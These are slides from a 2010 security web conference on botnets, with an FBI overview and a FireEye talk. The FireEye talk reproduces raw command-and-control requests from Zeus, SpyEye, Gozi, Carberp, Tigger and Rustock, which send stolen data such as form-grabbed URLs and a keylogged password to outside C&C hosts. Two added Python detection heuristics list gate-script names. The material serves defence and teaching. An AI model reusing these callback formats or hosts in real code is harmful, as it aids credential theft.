Botnets
Sponsored by: ISSA Web Conference
October 26, 2010
Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

Welcome: Conference Moderator Phillip H Griffin, Member - ISSA Educational Advisory Council, Web Conferences Committee

Agenda
• How Botnets Have Evolved – Chris Calderon - Special Agent, FBI
• Rooting Out the Bad Actors – Alex Lanstein - Systems Consulting Engineer, FireEye
• Joint Speaker Question & Answer
• Closing Comments

UNCLASSIFIED

How Botnets Have Evolved
presented by Special Agent Chris Calderon, FBI

Agenda
• What is a botnet?
• How are botnets created?
• Why are botnets created?
• Basic structure of a botnet
• Taking down a botnet
• How botnets are evolving
• Botnets in the news
• Questions

What is a botnet?
• A network of compromised computers (robots/bots)
• Controlled by a bot master / herder
• Used to carry out various illegal activities
• Services are often sold to other criminal elements

How are botnets created?
• Setup
  – Obtain reliable infrastructure
  – Develop malware and C&C software
• Victims
  – Malware loaded onto victim machines
  – Done through exploits and/or social engineering
• Manage
  – Continually update software / instructions to bots
  – Maintain statistics for the botnet

Why are botnets created?
• Spam
• Distributed Denial of Service (DDoS)
• Click Fraud
• Fake Anti-Virus
• Credential Theft
• Proxy Service
• Cyber Warfare

Basic Structure
[Diagram: Bot Master / Herder → C&C Servers → Victims]

Taking down a botnet
[Diagram: the same Bot Master / Herder → C&C Servers → Victims structure]

Botnets evolving
[Diagram: Bot Master / Herder → C&C Servers → Proxies → Victims]

Botnets evolving
[Diagram: Bot Master / Herder → Proxies → C&C Servers → Proxies → Victims]

Botnets in the news
• ZEUS
  – Steals and logs online banking credentials
  – Primarily targets high-balance accounts
  – Money "mules" used to get money to bad actors
  – Kit now used by many different groups
  – Estimated $70,000,000 stolen from US banks

Botnets in the news
• MARIPOSA (BUTTERFLY)
  – Steals online credentials, and also used in DDoS attacks
  – Estimated 12 million infected computers
  – Bad actors traced to Spain and arrested
  – Criminal proceedings ongoing

Botnets in the news
• SPAM BOTS
  – Conficker, Cutwail, Waledac, ...
  – Up to 10 million bots per botnet
  – Each botnet can send billions of spam emails per day
  – Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay-per-click advertising, ...

Questions?

Rooting out the Bad Actors
or: p2p, fast flux, and other botnet myths
Alex Lanstein, Senior Security Researcher, FireEye, Inc.

Today's Agenda
• Understanding the shift from conventional to modern malware, and the resultant hosting needs
• A few TTPs to uncover older or moderately sophisticated malware
• A detailed look at a few bots "in the news"

Conventional vs. Modern, APT Malware
Conventional Malware
• Characterized by using "spreading" techniques, custom C&C transport protocols, IRC communication
  – Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots
• Detectable through a variety of technologies/tactics:
  – NetWitness/Solera, enVision/ArcSight/Splunk, NIDS
  – Port scanning, high Windows port activity, non-HTTP over port 80, non-web traffic, etc.

Conventional vs. Modern Malware
Modern-ish malware:
• Characterized by infecting via browser-based exploits
• Exploit channel: PDF, Flash, IE/Firefox, QuickTime; C&C callback over HTTP(S)
• Malware: ZeuS, Gozi, Koobface, Rustock, SpyEye
• Partially detectable through manual traffic analysis fairly easily, but a full-time resource is needed

World's Top Malware
[Chart; source: FireEye Malware Intelligence Lab]

Modern Malware Infection Lifecycle
1. System gets exploited
  – Drive-by attacks in casual browsing
  – Links in targeted emails
  – Socially engineered binaries
2. Dropper malware installs
  – First step to establish control
  – Calls back out to criminal servers
  – Found on compromised sites, and Web 2.0, user-created content sites
3. Malicious data theft & long-term control established
  – Uploads data stolen via keyloggers, Trojans, bots, & file grabbers
  – One exploit leads to dozens of infections on same system
  – Criminals have built long-term control mechanisms into system
[Diagram labels: Compromised Web server or Web 2.0 site; Callback Server; Perimeter Security (signature, rule-based); Other gateway (list-based, signatures); Desktop antivirus; "Losing the threat arms race"]

Where is all this malware being hosted?
• Previously we used to see malware being hosted on infected home machines
• Web filters responded by blocking access to domains that had multiple A records in residential IP space
• Now it's being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR-registered IP space!

Root of the Problem
• There is no "Internet Police"!
• Who controls the Internet? ICANN? IANA? CERTs? USCYBERCOM? Tier 1 ISPs?
• Depends who you ask and how big a stink you make.

How the Internet is delegated
In the name space (think DNS):
• ICANN → Registries
• Registries == Verisign, Afilias, ccTLD operators
• Registries sell to certified gTLD and regional registrars
• Registrars == namecheap.com, godaddy.com, netsol.com
• Registrars sell to registrants (end user)

How the Internet is delegated
In the IP space:
• ICANN/IANA (Internet Assigned Numbers Authority)
• IANA → RIRs
• RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
• RIRs → LIRs
• LIRs are generally data centers and ISPs

ICANN't do anything!
• ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn't violate the contract. These contracts have no mention of "content".
• Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.
• Large pushback when someone even suspects they are trying to take an authoritative stance on something.
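The "Where is all this malware being hosted?" slide describes the web-filter heuristic that blocked domains whose A records were scattered across residential IP space, and notes that it stops working once hosting moves to dedicated servers. The following is an added example, not from the slides or FireEye, that implements that heuristic over constructed DNS answers and a constructed residential prefix list (a real filter would use an ISP/ASN feed); the thresholds are assumptions. It shows the flux-style domain being flagged and the single data-center host passing untouched.

```python
"""Residential-A-record heuristic for fast-flux style hosting (added example).

All DNS answers and prefixes below are constructed from documentation ranges
(RFC 5737); the residential list and thresholds are assumptions.
"""
import ipaddress

# Constructed: prefixes we pretend belong to consumer (residential) ISPs.
RESIDENTIAL_PREFIXES = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]

# Constructed DNS answers: domain -> (TTL in seconds, list of A records).
ANSWERS = {
    # Many short-lived A records on consumer prefixes: classic fast flux.
    "flux.example": (300, ["192.0.2.17", "192.0.2.201", "198.51.100.9",
                           "198.51.100.77", "198.51.100.130"]),
    # Ordinary corporate host: one record, long TTL, data-center space.
    "corp.example": (86400, ["203.0.113.10"]),
    # Malware moved to a dedicated server: looks exactly like corp.example.
    "bulletproof.example": (3600, ["203.0.113.50"]),
}


def is_residential(ip):
    """True if the address falls inside one of the residential prefixes."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RESIDENTIAL_PREFIXES)


def distinct_slash24s(records):
    """Count distinct /24s among the A records (spread across the address space)."""
    return len({ipaddress.ip_network(ip + "/24", strict=False) for ip in records})


def classify(domain, min_records=3, max_ttl=600, min_residential_share=0.5):
    """Apply the filter heuristic to one domain's answer and return the verdict.

    Flags the domain only when it has several A records, most of them in
    residential space, rotated with a short TTL. Thresholds are assumptions.
    """
    ttl, records = ANSWERS[domain]
    residential = sum(1 for ip in records if is_residential(ip))
    share = residential / len(records) if records else 0.0
    flagged = (len(records) >= min_records
               and share >= min_residential_share
               and ttl <= max_ttl)
    return {
        "domain": domain,
        "records": len(records),
        "residential": residential,
        "slash24s": distinct_slash24s(records),
        "ttl": ttl,
        "flagged": flagged,
    }


def run_all():
    """Classify every constructed answer; returns a dict of verdicts."""
    return {domain: classify(domain) for domain in ANSWERS}


if __name__ == "__main__":
    for verdict in run_all().values():
        print(verdict)
```

The blind spot is visible in the output: `bulletproof.example` has the same shape as `corp.example` (one A record, data-center prefix, long TTL), so a filter built around residential A records has nothing to key on, which is exactly the shift the slide describes.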
Big bots in 2010

Rustock – still sticking around

    POST /index.php?topic=33.117 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Referer: http://go-thailand-now.com/
    Content-Type: application/x-www-form-urlencoded
    Content-Encoding: gzip
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
    Host: go-thailand-now.com
    Content-Length: 214
    Connection: Keep-Alive
    Cache-Control: no-cache

Gozi

    POST /cgi-bin/forms.cgi HTTP/1.0
    Content-Type: multipart/form-data; boundary=--------------------------139b9b3139b9b3139b9b3
    User-Agent: IE
    Host: 91.216.215.130
    Content-Length: 453
    Pragma: no-cache

    ----------------------------139b9b3139b9b3139b9b3
    Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"
    Content-Type: application/octet-stream

    URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901 FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove
    ----------------------------139b9b3139b9b3139b9b3--

Zeus

    POST /xed/gate.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
    Host: schastlivieiveselierebyta0001.com
    Content-Length: 329
    Connection: Keep-Alive
    Cache-Control: no-cache

    [encrypted binary POST body, not reproduced]

Tigger – Not just financials anymore

    POST /track_c.cgi HTTP/1.0
    Content-Length: 81

    [obfuscated binary POST body, not reproduced]

    SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login Title: <untitled> Process: C:\Program Files\Internet Explorer\iexplore.exe User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]] {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timezoneOct=420&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true&awcharset=UTF-8&KEYLOG=s}}}

SpyEye – ZeuS replacement?

    GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232&ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKLAF24&md5=9012ab902413dcf8gga89 HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: hahsdhsl.com
    Pragma: no-cache

    GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.promohru.in
    Pragma: no-cache

Carberp – Yet Another Datastealer

    POST /recv.php HTTP/1.1
    Host: 194.54.80.146
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
    Accept: text/html
    Connection: Close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 331

    uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1&data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom%2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7
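The captures above are the "manual traffic analysis" the earlier slide says catches modern-ish malware: a bare product name where a browser would send a full Mozilla/ string (Gozi, SpyEye), a Host header that is a raw IP (Gozi, Carberp), a POST with no User-Agent or Host at all (Tigger), gate scripts such as gate.php and recv.php, and a form body that carries the URL of the page whose fields were grabbed (Carberp). The following is an added example, not from the slides or FireEye, that turns those observations into scoring rules over constructed sample requests; the rule weights, the sample hosts and the sample form field values are assumptions, chosen only to exercise each rule.

```python
"""Heuristic triage of HTTP requests for C&C-callback traits (added example).

Sample requests are constructed to mirror the shapes shown on the slides;
gate names come from the slides, everything else (hosts, weights) is assumed.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Request-path basenames that serve as C&C gates in the captures on the slides.
GATE_NAMES = {"gate.php", "recv.php", "forms.cgi", "track_c.cgi"}

# Real browsers announce themselves with a Mozilla/ or Opera/ product token;
# a bare "IE" or "Microsoft Internet Explorer" is not something IE ever sends.
REAL_BROWSER_UA = re.compile(r"^(Mozilla|Opera)/\d")

# Constructed sample requests (hosts use documentation / reserved names only).
SAMPLES = {
    "spyeye_like": (
        "GET /web/map/gate.php?guid=user1!ABC!123&ver=10280&stat=ONLINE&plg=ftpbc;socks5 HTTP/1.0\r\n"
        "User-Agent: Microsoft Internet Explorer\r\n"
        "Host: gate.example\r\n"
        "Pragma: no-cache\r\n\r\n"
    ),
    "carberp_like": (
        "POST /recv.php HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10\r\n"
        "Accept: text/html\r\n"
        "Connection: Close\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "uid=CONSTRUCTED0001&brw=2&type=1&data=https%3A%2F%2Fbank%2Eexample%2Flogin%3Fsession%3D1"
    ),
    "tigger_like": (
        "POST /track_c.cgi HTTP/1.0\r\n"
        "Content-Length: 8\r\n\r\n"
        "\x01\x7f\x02\x7e\x03\x7d\x04\x7c"   # stand-in for the obfuscated body
    ),
    "benign_login": (
        "POST /login HTTP/1.1\r\n"
        "Host: www.example.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/100.0\r\n"
        "Accept: text/html,application/xhtml+xml\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "username=alice&next=%2Faccount"
    ),
}


def parse_request(raw):
    """Split a raw request into (method, path, version, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers, body


def is_bare_ip(host):
    """True when the Host header is a literal IP rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def urls_in_form_body(body):
    """Percent-decode a form body and return any URLs embedded in its values."""
    found = []
    for values in parse_qs(body).values():
        for value in values:
            found.extend(re.findall(r"https?://\S+", value))
    return found


def score_request(raw):
    """Return (score, reasons, urls); each matched rule adds one point."""
    method, path, version, headers, body = parse_request(raw)
    host, ua = headers.get("host", ""), headers.get("user-agent", "")
    basename = urlsplit(path).path.rsplit("/", 1)[-1]
    reasons = []
    if basename in GATE_NAMES:
        reasons.append(f"path basename {basename!r} matches a known gate script")
    if is_bare_ip(host):
        reasons.append(f"Host is a bare IP address ({host})")
    if not host:
        reasons.append("no Host header")
    if not ua:
        reasons.append("no User-Agent header")
    elif not REAL_BROWSER_UA.match(ua):
        reasons.append(f"User-Agent {ua!r} is not a browser product string")
    if method == "POST" and "accept" not in headers:
        reasons.append("POST without an Accept header")
    urls = []
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        urls = urls_in_form_body(body)
        if urls:
            reasons.append("form body carries an embedded page URL (form-grab pattern)")
    return len(reasons), reasons, urls


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, score_request(raw))
```

The scores are a triage aid for the analyst the slide says is needed, not a verdict: the Rustock capture on the slide would score zero under these rules (full IE User-Agent, named host, Accept present), which is the point of the "full-time resource" remark, and the decoded `data=` URL in the Carberp-style sample is what tells the analyst which site's login form was grabbed.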